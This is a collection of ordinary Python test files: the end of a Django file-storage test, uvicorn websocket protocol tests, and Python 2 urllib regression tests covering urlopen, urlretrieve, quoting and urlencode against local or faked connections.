        self.storage.save('bytes.txt', ContentFile(b"content"))
        # Non-ASCII text content must round-trip through save as well.
        self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
    """
    Test file-like objects (#15644).
    """
    available_apps = []
    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.storage = FileSystemStorage(location=self.temp_dir)
    def tearDown(self):
        shutil.rmtree(self.temp_dir)
    def test_urllib2_urlopen(self):
        """
        Test the File storage API with a file like object coming from urllib2.urlopen()
        """
        file_obj = urlopen(self.live_server_url + '/')
        f = File(file_obj)
        stored_filename = self.storage.save("remote_file.html", f)
        # Fetch the page a second time to compare against the stored copy.
        remote_file = urlopen(self.live_server_url + '/')
        with self.storage.open(stored_filename) as stored_file:
            self.assertEqual(stored_file.read(), remote_file.read())
|
test_websocket.py | from uvicorn.protocols.http.h11_impl import H11Protocol
from uvicorn.protocols.websockets.websockets_impl import WebSocketProtocol
from uvicorn.protocols.websockets.wsproto_impl import WSProtocol
import asyncio
import functools
import time
import threading
import requests
import pytest
import websockets
from contextlib import contextmanager
class WebSocketResponse:
    """Minimal ASGI websocket app dispatching events to ``websocket_*`` methods.

    Each incoming message of type ``"websocket.x.y"`` is routed to a method
    named ``websocket_x_y`` if the subclass defines one. The loop ends after
    the disconnect event has been handled.
    """

    def __init__(self, scope):
        self.scope = scope

    async def __call__(self, receive, send):
        # Expose the send callable so handler methods can reply.
        self.send = send
        finished = False
        while not finished:
            event = await receive()
            handler_name = event["type"].replace(".", "_")
            finished = handler_name == 'websocket_disconnect'
            handler = getattr(self, handler_name, None)
            if handler is None:
                continue
            await handler(event)
def run_loop(loop):
    """Drive *loop* until something calls loop.stop(), then dispose of it."""
    loop.run_forever()
    loop.close()
@contextmanager
def run_server(app, protocol_cls):
    """Serve *app* over HTTP/websocket on an ephemeral port in a background thread.

    Yields the ``ws://`` URL of the server. On exit, waits for in-flight
    protocol tasks to drain, stops the loop from this thread, and joins the
    loop thread (which closes the loop — see run_loop).
    """
    tasks = set()
    # Detach the default loop so the server loop is explicitly owned here.
    asyncio.set_event_loop(None)
    loop = asyncio.new_event_loop()
    protocol = functools.partial(H11Protocol, app=app, loop=loop, tasks=tasks, ws_protocol_class=protocol_cls)
    create_server_task = loop.create_server(protocol, host="127.0.0.1")
    server = loop.run_until_complete(create_server_task)
    # Port 0 was implied: read the actual bound port back from the socket.
    url = "ws://127.0.0.1:%d/" % server.sockets[0].getsockname()[1]
    try:
        # Run the event loop in a new thread.
        thread = threading.Thread(target=run_loop, args=[loop])
        thread.start()
        # Return the contextmanager state.
        yield url
    finally:
        # Close the loop from our main thread.
        while tasks:
            time.sleep(0.01)
        loop.call_soon_threadsafe(loop.stop)
        thread.join()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_invalid_upgrade(protocol_cls):
    """An Upgrade request missing the websocket key/version yields a 400."""
    app = lambda scope: None
    with run_server(app, protocol_cls=protocol_cls) as url:
        url = url.replace("ws://", "http://")
        response = requests.get(
            url, headers={"upgrade": "websocket", "connection": "upgrade"}, timeout=5
        )
        assert response.status_code == 400
        # The exact error text differs between the two protocol backends.
        assert response.text in [
            'Missing Sec-WebSocket-Key header\n',
            'Missing Sec-WebSocket-Version header',  # websockets
            'Missing or empty Sec-WebSocket-Key header\n'  # wsproto
        ]
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_accept_connection(protocol_cls):
    """Replying 'websocket.accept' to connect completes the handshake."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
    async def open_connection(url):
        async with websockets.connect(url) as websocket:
            return websocket.open
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        is_open = loop.run_until_complete(open_connection(url))
        assert is_open
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_close_connection(protocol_cls):
    """Replying 'websocket.close' to connect rejects the handshake."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.close"})
    async def open_connection(url):
        try:
            await websockets.connect(url)
        except websockets.exceptions.InvalidHandshake:
            return False
        return True
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        is_open = loop.run_until_complete(open_connection(url))
        assert not is_open
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_text_data_to_client(protocol_cls):
    """A 'websocket.send' with a text payload reaches the client as str."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "text": "123"})
    async def get_data(url):
        async with websockets.connect(url) as websocket:
            return await websocket.recv()
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(get_data(url))
        assert data == "123"
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_binary_data_to_client(protocol_cls):
    """A 'websocket.send' with a bytes payload reaches the client as bytes."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "bytes": b"123"})
    async def get_data(url):
        async with websockets.connect(url) as websocket:
            return await websocket.recv()
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(get_data(url))
        assert data == b"123"
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_and_close_connection(protocol_cls):
    """The server may send a final frame then close; the client sees both."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "text": "123"})
            await self.send({"type": "websocket.close"})

    async def get_data(url):
        async with websockets.connect(url) as websocket:
            data = await websocket.recv()
            is_open = True
            try:
                await websocket.recv()
            except Exception:
                # Fixed: a bare ``except:`` also swallowed SystemExit and
                # KeyboardInterrupt. The expected failure here is
                # websockets' ConnectionClosed (an Exception subclass).
                is_open = False
            return (data, is_open)

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        (data, is_open) = loop.run_until_complete(get_data(url))
        assert data == "123"
        assert not is_open
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_text_data_to_server(protocol_cls):
    """Client text frames arrive as 'websocket.receive' with a 'text' key."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
        async def websocket_receive(self, message):
            # Echo the received text straight back to the client.
            _text = message.get("text")
            await self.send({"type": "websocket.send", "text": _text})
    async def send_text(url):
        async with websockets.connect(url) as websocket:
            await websocket.send("abc")
            return await websocket.recv()
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(send_text(url))
        assert data == "abc"
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_binary_data_to_server(protocol_cls):
    """Client binary frames arrive as 'websocket.receive' with a 'bytes' key."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
        async def websocket_receive(self, message):
            # Echo the received bytes straight back to the client.
            _bytes = message.get("bytes")
            await self.send({"type": "websocket.send", "bytes": _bytes})
    async def send_text(url):
        async with websockets.connect(url) as websocket:
            await websocket.send(b"abc")
            return await websocket.recv()
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        data = loop.run_until_complete(send_text(url))
        assert data == b"abc"
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_after_protocol_close(protocol_cls):
    """Sending on an already-closed websocket raises on the server side."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept"})
            await self.send({"type": "websocket.send", "text": "123"})
            await self.send({"type": "websocket.close"})
            # A send after close must fail loudly.
            with pytest.raises(Exception):
                await self.send({"type": "websocket.send", "text": "123"})

    async def get_data(url):
        async with websockets.connect(url) as websocket:
            data = await websocket.recv()
            is_open = True
            try:
                await websocket.recv()
            except Exception:
                # Fixed: a bare ``except:`` also swallowed SystemExit and
                # KeyboardInterrupt; the expected failure is websockets'
                # ConnectionClosed (an Exception subclass).
                is_open = False
            return (data, is_open)

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        (data, is_open) = loop.run_until_complete(get_data(url))
        assert data == "123"
        assert not is_open
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_missing_handshake(protocol_cls):
    """An app that never accepts nor closes produces a 500 handshake status."""
    class App:
        def __init__(self, scope):
            pass
        async def __call__(self, receive, send):
            pass
    async def connect(url):
        await websockets.connect(url)
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.status_code == 500
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_send_before_handshake(protocol_cls):
    """Sending data before accepting the handshake is a 500-level error."""
    class App:
        def __init__(self, scope):
            pass
        async def __call__(self, receive, send):
            await send({"type": "websocket.send", "text": "123"})
    async def connect(url):
        await websockets.connect(url)
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.status_code == 500
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_duplicate_handshake(protocol_cls):
    """Accepting twice is a protocol error: the connection drops abnormally (1006)."""
    class App:
        def __init__(self, scope):
            pass
        async def __call__(self, receive, send):
            await send({"type": "websocket.accept"})
            await send({"type": "websocket.accept"})

    async def connect(url):
        async with websockets.connect(url) as websocket:
            # recv() only blocks until the server drops us; the result is
            # irrelevant (the unused ``data`` binding was removed).
            await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.code == 1006
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_asgi_return_value(protocol_cls):
    """
    The ASGI callable should return 'None'. If it doesn't make sure that
    the connection is closed with an error condition.
    """
    class App:
        def __init__(self, scope):
            pass
        async def __call__(self, receive, send):
            await send({"type": "websocket.accept"})
            return 123

    async def connect(url):
        async with websockets.connect(url) as websocket:
            # recv() only blocks until the server drops us; the result is
            # irrelevant (the unused ``data`` binding was removed).
            await websocket.recv()

    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
            loop.run_until_complete(connect(url))
        assert exc.value.code == 1006
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_app_close(protocol_cls):
    """A server-initiated close surfaces to the client as a normal 1000 close."""
    class App:
        def __init__(self, scope):
            pass
        async def __call__(self, receive, send):
            while True:
                message = await receive()
                if message['type'] == 'websocket.connect':
                    await send({"type": "websocket.accept"})
                elif message['type'] == 'websocket.receive':
                    # Close as soon as the client sends anything.
                    await send({"type": "websocket.close"})
                elif message['type'] == 'websocket.disconnect':
                    break
    async def websocket_session(url):
        async with websockets.connect(url) as websocket:
            await websocket.ping()
            await websocket.send('abc')
            await websocket.recv()
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        with pytest.raises(websockets.exceptions.ConnectionClosed) as exc:
            loop.run_until_complete(websocket_session(url))
        assert exc.value.code == 1000
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
def test_client_close(protocol_cls):
    """A client-initiated close is delivered to the app as 'websocket.disconnect'."""
    class App:
        def __init__(self, scope):
            pass
        async def __call__(self, receive, send):
            while True:
                message = await receive()
                if message['type'] == 'websocket.connect':
                    await send({"type": "websocket.accept"})
                elif message['type'] == 'websocket.receive':
                    pass
                elif message['type'] == 'websocket.disconnect':
                    break
    async def websocket_session(url):
        # Exiting the ``async with`` performs the client-side close.
        async with websockets.connect(url) as websocket:
            await websocket.ping()
            await websocket.send('abc')
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        loop.run_until_complete(websocket_session(url))
        loop.close()
@pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol])
@pytest.mark.parametrize("subprotocol", ["proto1", "proto2"])
def test_subprotocols(protocol_cls, subprotocol):
    """The subprotocol chosen in 'websocket.accept' is negotiated to the client."""
    class App(WebSocketResponse):
        async def websocket_connect(self, message):
            await self.send({"type": "websocket.accept", "subprotocol": subprotocol})
    async def get_subprotocol(url):
        async with websockets.connect(
            url, subprotocols=["proto1", "proto2"]
        ) as websocket:
            return websocket.subprotocol
    with run_server(App, protocol_cls=protocol_cls) as url:
        loop = asyncio.new_event_loop()
        accepted_subprotocol = loop.run_until_complete(get_subprotocol(url))
        assert accepted_subprotocol == subprotocol
        loop.close()
|
test_urllib.py | """Regression tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import tempfile
import StringIO
def hexescape(char):
    """Escape char as RFC 2396 specifies: '%' + uppercase hex, min two digits."""
    return "%%%02X" % ord(char)
class urlopen_FileTests(unittest.TestCase):
    """Test urlopen() opening a temporary file.
    Try to test as much functionality as possible so as to cut down on reliance
    on connecting to the Net for testing.
    """
    def setUp(self):
        """Setup of a temp file to use for testing"""
        self.text = "test_urllib: %s\n" % self.__class__.__name__
        FILE = file(test_support.TESTFN, 'wb')
        try:
            FILE.write(self.text)
        finally:
            FILE.close()
        self.pathname = test_support.TESTFN
        self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
    def tearDown(self):
        """Shut down the open object"""
        self.returned_obj.close()
        os.remove(test_support.TESTFN)
    def test_interface(self):
        # Make sure object returned by urlopen() has the specified methods
        for attr in ("read", "readline", "readlines", "fileno",
                     "close", "info", "geturl", "getcode", "__iter__"):
            self.assert_(hasattr(self.returned_obj, attr),
                         "object returned by urlopen() lacks %s attribute" %
                         attr)
    def test_read(self):
        self.assertEqual(self.text, self.returned_obj.read())
    def test_readline(self):
        self.assertEqual(self.text, self.returned_obj.readline())
        self.assertEqual('', self.returned_obj.readline(),
                         "calling readline() after exhausting the file did not"
                         " return an empty string")
    def test_readlines(self):
        lines_list = self.returned_obj.readlines()
        self.assertEqual(len(lines_list), 1,
                         "readlines() returned the wrong number of lines")
        self.assertEqual(lines_list[0], self.text,
                         "readlines() returned improper text")
    def test_fileno(self):
        # The object should expose a real OS-level file descriptor.
        file_num = self.returned_obj.fileno()
        self.assert_(isinstance(file_num, int),
                     "fileno() did not return an int")
        self.assertEqual(os.read(file_num, len(self.text)), self.text,
                         "Reading on the file descriptor returned by fileno() "
                         "did not return the expected text")
    def test_close(self):
        # Test close() by calling it here and then having it be called again
        # by the tearDown() method for the test
        self.returned_obj.close()
    def test_info(self):
        self.assert_(isinstance(self.returned_obj.info(), mimetools.Message))
    def test_geturl(self):
        self.assertEqual(self.returned_obj.geturl(), self.pathname)
    def test_getcode(self):
        # file: URLs have no HTTP status, so getcode() is None.
        self.assertEqual(self.returned_obj.getcode(), None)
    def test_iter(self):
        # Test iterator
        # Don't need to count number of iterations since test would fail the
        # instant it returned anything beyond the first line from the
        # comparison
        for line in self.returned_obj.__iter__():
            self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
    """getproxies_environment() behavior with proxy-related env vars."""
    def setUp(self):
        # Records changes to env vars
        self.env = test_support.EnvironmentVarGuard()
        # Delete all proxy related env vars. Iterate over a snapshot of the
        # keys: env.unset() mutates os.environ, and mutating a dict while
        # iterating over it (the original used iteritems()) raises
        # RuntimeError.
        for k in list(os.environ):
            if 'proxy' in k.lower():
                self.env.unset(k)
    def tearDown(self):
        # Restore all proxy related env vars
        self.env.__exit__()
        del self.env
    def test_getproxies_environment_keep_no_proxies(self):
        self.env.set('NO_PROXY', 'localhost')
        proxies = urllib.getproxies_environment()
        # getproxies_environment use lowered case truncated (no '_proxy') keys
        self.assertEquals('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
    """Test urlopen() opening a fake http connection."""
    def fakehttp(self, fakedata):
        # Monkey-patch httplib so urlopen() reads *fakedata* from an
        # in-memory socket instead of the network. Must be undone with
        # unfakehttp() in a finally block.
        class FakeSocket(StringIO.StringIO):
            def sendall(self, str): pass
            def makefile(self, mode, name): return self
            def read(self, amt=None):
                if self.closed: return ''
                return StringIO.StringIO.read(self, amt)
            def readline(self, length=None):
                if self.closed: return ''
                return StringIO.StringIO.readline(self, length)
        class FakeHTTPConnection(httplib.HTTPConnection):
            def connect(self):
                self.sock = FakeSocket(fakedata)
        # Guard against a previous test leaving the patch in place.
        assert httplib.HTTP._connection_class == httplib.HTTPConnection
        httplib.HTTP._connection_class = FakeHTTPConnection
    def unfakehttp(self):
        # Undo the monkey-patching applied by fakehttp().
        httplib.HTTP._connection_class = httplib.HTTPConnection
    def test_read(self):
        self.fakehttp('Hello!')
        try:
            fp = urllib.urlopen("http://python.org/")
            self.assertEqual(fp.readline(), 'Hello!')
            self.assertEqual(fp.readline(), '')
            self.assertEqual(fp.geturl(), 'http://python.org/')
            self.assertEqual(fp.getcode(), 200)
        finally:
            self.unfakehttp()
    def test_read_bogus(self):
        # urlopen() should raise IOError for many error codes.
        self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
        try:
            self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
        finally:
            self.unfakehttp()
    def test_empty_socket(self):
        # urlopen() raises IOError if the underlying socket does not send any
        # data. (#1680230)
        self.fakehttp('')
        try:
            self.assertRaises(IOError, urllib.urlopen, 'http://something')
        finally:
            self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
    """Test urllib.urlretrieve() on local files"""
    def setUp(self):
        # Create a list of temporary files. Each item in the list is a file
        # name (absolute path or relative to the current working directory).
        # All files in this list will be deleted in the tearDown method. Note,
        # this only helps to makes sure temporary files get deleted, but it
        # does nothing about trying to close files that may still be open. It
        # is the responsibility of the developer to properly close files even
        # when exceptional conditions occur.
        self.tempFiles = []
        # Create a temporary file.
        self.registerFileForCleanUp(test_support.TESTFN)
        self.text = 'testing urllib.urlretrieve'
        try:
            FILE = file(test_support.TESTFN, 'wb')
            FILE.write(self.text)
            FILE.close()
        finally:
            try: FILE.close()
            except: pass
    def tearDown(self):
        # Delete the temporary files.
        for each in self.tempFiles:
            try: os.remove(each)
            except: pass
    def constructLocalFileUrl(self, filePath):
        # Build a file:// URL for an absolute local path.
        return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
    def createNewTempFile(self, data=""):
        """Creates a new temporary file containing the specified data,
        registers the file for deletion during the test fixture tear down, and
        returns the absolute path of the file."""
        newFd, newFilePath = tempfile.mkstemp()
        try:
            self.registerFileForCleanUp(newFilePath)
            newFile = os.fdopen(newFd, "wb")
            newFile.write(data)
            newFile.close()
        finally:
            try: newFile.close()
            except: pass
        return newFilePath
    def registerFileForCleanUp(self, fileName):
        # Queue *fileName* for removal in tearDown().
        self.tempFiles.append(fileName)
    def test_basic(self):
        # Make sure that a local file just gets its own location returned and
        # a headers value is returned.
        result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
        self.assertEqual(result[0], test_support.TESTFN)
        self.assert_(isinstance(result[1], mimetools.Message),
                     "did not get a mimetools.Message instance as second "
                     "returned value")
    def test_copy(self):
        # Test that setting the filename argument works.
        second_temp = "%s.2" % test_support.TESTFN
        self.registerFileForCleanUp(second_temp)
        result = urllib.urlretrieve(self.constructLocalFileUrl(
            test_support.TESTFN), second_temp)
        self.assertEqual(second_temp, result[0])
        self.assert_(os.path.exists(second_temp), "copy of the file was not "
                                                  "made")
        FILE = file(second_temp, 'rb')
        try:
            text = FILE.read()
            FILE.close()
        finally:
            try: FILE.close()
            except: pass
        self.assertEqual(self.text, text)
    def test_reporthook(self):
        # Make sure that the reporthook works.
        def hooktester(count, block_size, total_size, count_holder=[0]):
            self.assert_(isinstance(count, int))
            self.assert_(isinstance(block_size, int))
            self.assert_(isinstance(total_size, int))
            self.assertEqual(count, count_holder[0])
            count_holder[0] = count_holder[0] + 1
        second_temp = "%s.2" % test_support.TESTFN
        self.registerFileForCleanUp(second_temp)
        urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
            second_temp, hooktester)
    def test_reporthook_0_bytes(self):
        # Test on zero length file. Should call reporthook only 1 time.
        report = []
        def hooktester(count, block_size, total_size, _report=report):
            _report.append((count, block_size, total_size))
        srcFileName = self.createNewTempFile()
        urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
            test_support.TESTFN, hooktester)
        self.assertEqual(len(report), 1)
        self.assertEqual(report[0][2], 0)
    def test_reporthook_5_bytes(self):
        # Test on 5 byte file. Should call reporthook only 2 times (once when
        # the "network connection" is established and once when the block is
        # read). Since the block size is 8192 bytes, only one block read is
        # required to read the entire file.
        report = []
        def hooktester(count, block_size, total_size, _report=report):
            _report.append((count, block_size, total_size))
        srcFileName = self.createNewTempFile("x" * 5)
        urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
            test_support.TESTFN, hooktester)
        self.assertEqual(len(report), 2)
        self.assertEqual(report[0][1], 8192)
        self.assertEqual(report[0][2], 5)
    def test_reporthook_8193_bytes(self):
        # Test on 8193 byte file. Should call reporthook only 3 times (once
        # when the "network connection" is established, once for the next 8192
        # bytes, and once for the last byte).
        report = []
        def hooktester(count, block_size, total_size, _report=report):
            _report.append((count, block_size, total_size))
        srcFileName = self.createNewTempFile("x" * 8193)
        urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
            test_support.TESTFN, hooktester)
        self.assertEqual(len(report), 3)
        self.assertEqual(report[0][1], 8192)
        self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
    """Tests for urllib.quote() and urllib.quote_plus()
    According to RFC 2396 ("Uniform Resource Identifiers"), to escape a
    character you write it as '%' + <2 character US-ASCII hex value>. The Python
    code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
    Case does not matter on the hex letters.
    The various character sets specified are:
    Reserved characters : ";/?:@&=+$,"
        Have special meaning in URIs and must be escaped if not being used for
        their special meaning
    Data characters : letters, digits, and "-_.!~*'()"
        Unreserved and do not need to be escaped; can be, though, if desired
    Control characters : 0x00 - 0x1F, 0x7F
        Have no use in URIs so must be escaped
    space : 0x20
        Must be escaped
    Delimiters : '<>#%"'
        Must be escaped
    Unwise : "{}|\^[]`"
        Must be escaped
    """
    def test_never_quote(self):
        # Make sure quote() does not quote letters, digits, and "_,.-"
        do_not_quote = ''.join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
                                "abcdefghijklmnopqrstuvwxyz",
                                "0123456789",
                                "_.-"])
        result = urllib.quote(do_not_quote)
        self.assertEqual(do_not_quote, result,
                         "using quote(): %s != %s" % (do_not_quote, result))
        result = urllib.quote_plus(do_not_quote)
        self.assertEqual(do_not_quote, result,
                         "using quote_plus(): %s != %s" % (do_not_quote, result))
    def test_default_safe(self):
        # Test '/' is default value for 'safe' parameter
        self.assertEqual(urllib.quote.func_defaults[0], '/')
    def test_safe(self):
        # Test setting 'safe' parameter does what it should do
        quote_by_default = "<>"
        result = urllib.quote(quote_by_default, safe=quote_by_default)
        self.assertEqual(quote_by_default, result,
                         "using quote(): %s != %s" % (quote_by_default, result))
        result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
        self.assertEqual(quote_by_default, result,
                         "using quote_plus(): %s != %s" %
                         (quote_by_default, result))
    def test_default_quoting(self):
        # Make sure all characters that should be quoted are by default sans
        # space (separate test for that).
        should_quote = [chr(num) for num in range(32)]  # For 0x00 - 0x1F
        should_quote.append('<>#%"{}|\^[]`')
        should_quote.append(chr(127))  # For 0x7F
        should_quote = ''.join(should_quote)
        for char in should_quote:
            result = urllib.quote(char)
            self.assertEqual(hexescape(char), result,
                             "using quote(): %s should be escaped to %s, not %s" %
                             (char, hexescape(char), result))
            result = urllib.quote_plus(char)
            self.assertEqual(hexescape(char), result,
                             "using quote_plus(): "
                             "%s should be escaped to %s, not %s" %
                             (char, hexescape(char), result))
        del should_quote
        partial_quote = "ab[]cd"
        expected = "ab%5B%5Dcd"
        result = urllib.quote(partial_quote)
        self.assertEqual(expected, result,
                         "using quote(): %s != %s" % (expected, result))
        # Fixed: the original reused the quote() result here, so quote_plus()
        # was never actually exercised on partial_quote.
        result = urllib.quote_plus(partial_quote)
        self.assertEqual(expected, result,
                         "using quote_plus(): %s != %s" % (expected, result))
    def test_quoting_space(self):
        # Make sure quote() and quote_plus() handle spaces as specified in
        # their unique way
        result = urllib.quote(' ')
        self.assertEqual(result, hexescape(' '),
                         "using quote(): %s != %s" % (result, hexescape(' ')))
        result = urllib.quote_plus(' ')
        self.assertEqual(result, '+',
                         "using quote_plus(): %s != +" % result)
        given = "a b cd e f"
        expect = given.replace(' ', hexescape(' '))
        result = urllib.quote(given)
        self.assertEqual(expect, result,
                         "using quote(): %s != %s" % (expect, result))
        expect = given.replace(' ', '+')
        result = urllib.quote_plus(given)
        self.assertEqual(expect, result,
                         "using quote_plus(): %s != %s" % (expect, result))
    def test_quoting_plus(self):
        # A literal '+' must be escaped by quote_plus() unless declared safe.
        self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
                         'alpha%2Bbeta+gamma')
        self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
                         'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
    """Tests for unquote() and unquote_plus()
    See the doc string for QuotingTests for details on quoting and such.
    """
    def test_unquoting(self):
        # Make sure unquoting of all ASCII values works
        escape_list = []
        for num in range(128):
            given = hexescape(chr(num))
            expect = chr(num)
            result = urllib.unquote(given)
            self.assertEqual(expect, result,
                             "using unquote(): %s != %s" % (expect, result))
            result = urllib.unquote_plus(given)
            self.assertEqual(expect, result,
                             "using unquote_plus(): %s != %s" %
                             (expect, result))
            escape_list.append(given)
        escape_string = ''.join(escape_list)
        del escape_list
        # The only '%' left after unquoting is the one decoded from '%25'.
        # Fixed: the messages claimed "using quote()" and the second call
        # duplicated unquote() instead of exercising unquote_plus().
        result = urllib.unquote(escape_string)
        self.assertEqual(result.count('%'), 1,
                         "using unquote(): not all characters escaped; %s" %
                         result)
        result = urllib.unquote_plus(escape_string)
        self.assertEqual(result.count('%'), 1,
                         "using unquote_plus(): not all characters escaped: "
                         "%s" % result)
    def test_unquoting_parts(self):
        # Make sure unquoting works when have non-quoted characters
        # interspersed
        given = 'ab%sd' % hexescape('c')
        expect = "abcd"
        result = urllib.unquote(given)
        self.assertEqual(expect, result,
                         "using unquote(): %s != %s" % (expect, result))
        result = urllib.unquote_plus(given)
        self.assertEqual(expect, result,
                         "using unquote_plus(): %s != %s" % (expect, result))
    def test_unquoting_plus(self):
        # Test difference between unquote() and unquote_plus()
        given = "are+there+spaces..."
        expect = given
        result = urllib.unquote(given)
        self.assertEqual(expect, result,
                         "using unquote(): %s != %s" % (expect, result))
        expect = given.replace('+', ' ')
        result = urllib.unquote_plus(given)
        self.assertEqual(expect, result,
                         "using unquote_plus(): %s != %s" % (expect, result))
    def test_unquote_with_unicode(self):
        # unquote() on a unicode string decodes %XX to latin-1 code points.
        r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
        self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
    """Tests for urlencode()"""

    def help_inputtype(self, given, test_type):
        """Helper method for testing different input types.

        'given' must lead to only the pairs:
            * 1st, 1
            * 2nd, 2
            * 3rd, 3

        Test cannot assume anything about order.  Docs make no guarantee and
        have possible dictionary input.
        """
        expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
        result = urllib.urlencode(given)
        for expected in expect_somewhere:
            # NOTE: assert_ is the deprecated alias of assertTrue (kept as-is)
            self.assert_(expected in result,
                         "testing %s: %s not found in %s" %
                         (test_type, expected, result))
        self.assertEqual(result.count('&'), 2,
                         "testing %s: expected 2 '&'s; got %s" %
                         (test_type, result.count('&')))
        amp_location = result.index('&')
        on_amp_left = result[amp_location - 1]
        on_amp_right = result[amp_location + 1]
        # both characters flanking the first '&' must be pair values (digits)
        self.assert_(on_amp_left.isdigit() and on_amp_right.isdigit(),
                     "testing %s: '&' not located in proper place in %s" %
                     (test_type, result))
        self.assertEqual(len(result), (5 * 3) + 2,  # 5 chars per thing and amps
                         "testing %s: "
                         "unexpected number of characters: %s != %s" %
                         (test_type, len(result), (5 * 3) + 2))

    def test_using_mapping(self):
        # Test passing in a mapping object as an argument.
        self.help_inputtype({"1st": '1', "2nd": '2', "3rd": '3'},
                            "using dict as input type")

    def test_using_sequence(self):
        # Test passing in a sequence of two-item sequences as an argument.
        self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
                            "using sequence of two-item tuples as input")

    def test_quoting(self):
        # Make sure keys and values are quoted using quote_plus()
        given = {"&": "="}
        expect = "%s=%s" % (hexescape('&'), hexescape('='))
        result = urllib.urlencode(given)
        self.assertEqual(expect, result)
